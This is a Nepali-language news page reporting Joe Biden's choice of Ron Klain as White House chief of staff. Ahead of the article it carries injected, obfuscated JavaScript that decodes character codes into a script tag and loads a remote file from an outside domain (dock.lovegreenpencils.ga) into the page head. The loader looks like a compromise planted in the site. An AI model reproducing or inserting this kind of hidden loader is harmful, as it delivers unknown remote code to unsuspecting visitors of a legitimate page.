Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); बाइडेनका प्रमुख प्रबन्धकमा रोन क्लाइन – जनदिशा

बाइडेनका प्रमुख प्रबन्धकमा रोन क्लाइन

Last Updated Date:

संयुक्तराज्य अमेरिकाका राष्ट्रपति–निर्वाचित जो बाइडेनले आफ्नो प्रमुख प्रबन्धक (चिफ अफ स्टाफ) का रुपमा रोन क्लाइनलाई मनोनयन गरेका छन् ।

अमेरिकी राष्ट्रपति कार्यालय ह्वाइट हाउसको दैनिक कार्यसूची व्यवस्थित गर्ने महत्वपूर्ण जिम्मेवारीमा बाइडेनले लामो समयदेखि सल्लाहकारका रुपमा कार्यरत रोन क्लाइनलाई छनौट गरेका हुन् । रोन क्लाइनलाई ह्वाइट हाउसको कार्यव्यवस्था बारे लामो अनुभव छ ।

क्लाइनले सन् २०१४ मा इबोला सम्बोधन सम्बन्धी ह्वाइट हाउसमा संयोजकको भूमिका पनि निर्वाह गरेका थिए । यसपटक कोरोनाभाइरसको महामारी विश्वव्यापी रुपमा फैलिएको र यसबाट अमेरिका सर्वाधिक प्रभावित रहेको अवस्थामा क्लाइनले ह्वाइट हाउसमा महत्वपूर्ण जिम्मेवारी पाएका हुन् ।

विभक्त अमेरिकी राजनीति र सिनेटमा डेमोक्रेट अल्पमतमा परेको अवस्थामा सबै पक्षबीच सन्तुलन कायम गरी जल्दाबल्दा समस्या सुल्झाउनु पर्ने चुनौती छ ।बाइडेनले अहिले अमेरिकी समाजमा उत्पन्न संकटको घडीमा क्लाइन जस्ता अनुभवी र क्षमतावान व्यक्तिले सबै पक्षबीच सन्तुलन कायम गरी कार्य गर्न सफलता प्राप्त गर्ने विश्वास गरेका छन् ।

तत्कालीन अमेरिकी राष्ट्रपति बाराक ओबामाको पहिलो कार्यकालको समयमा क्लाइनले बाइडेनको प्रमुख प्रबन्धक (चिफ अफ स्टाफ) का रुपमा काम गरेका थिए । सन् १९९० को मध्यतिर तत्कालीन उपराष्ट्रपति अल गोरको पनि उनी प्रमुख प्रबन्धक थिए । पछिल्लो समय उनी बाइडेनको चुनावी अभियानका प्रमुख सल्लाहकारमध्ये एक थिए ।

क्लाइनको नियुक्तिले बाइडेन प्रशासनले काम थाले लगत्तै कोरोनाभाइरस संक्रमण रोक्नेतर्फ प्रमुख रुपमा ध्यान केन्द्रित गर्ने सम्भावना देखाएको छ । क्लाइनलाई जनस्वास्थ्यका साथै ह्वाइट हाउसका लागि इबोला नियन्त्रण टोलीको संयोजक भएर काम गरेको अनुभव छ ।

आफ्नो नियुक्तीको समाचार सार्वजनिक भएलगत्तै क्लाइनले ट्वीट गर्दै राष्ट्रपति–निर्वाचित बाइडेनले आफूमाथि देखाएको भरोसाका लागि कृतज्ञता व्यक्त गरेका छन् ।

उक्त पदका लागि स्टिभ रिचेट्टी वा ब्रुस रीडको नाम पनि चर्चामा थियो ।

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top